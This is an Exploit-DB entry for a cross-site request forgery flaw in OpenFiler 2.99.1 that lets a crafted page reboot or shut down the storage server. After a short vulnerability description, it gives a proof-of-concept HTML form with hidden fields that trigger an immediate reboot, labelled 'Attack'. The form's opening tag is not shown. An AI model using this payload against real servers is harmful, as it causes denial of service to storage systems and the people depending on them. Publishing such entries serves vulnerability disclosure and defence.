OpenFiler 2.99.1 - CSRF Vulnerability

ID EDB-ID:34818
Type exploitdb
Reporter Dolev Farhi
Modified 2014-09-29T00:00:00


OpenFiler 2.99.1 - CSRF Vulnerability. CVE-2014-7190. Webapps exploit for php platform

# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage:
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A
Software Description
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.
Steps to reproduce / PoC:
<div align="center">

<h2><b>DoS <b></h2>
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="Attack" />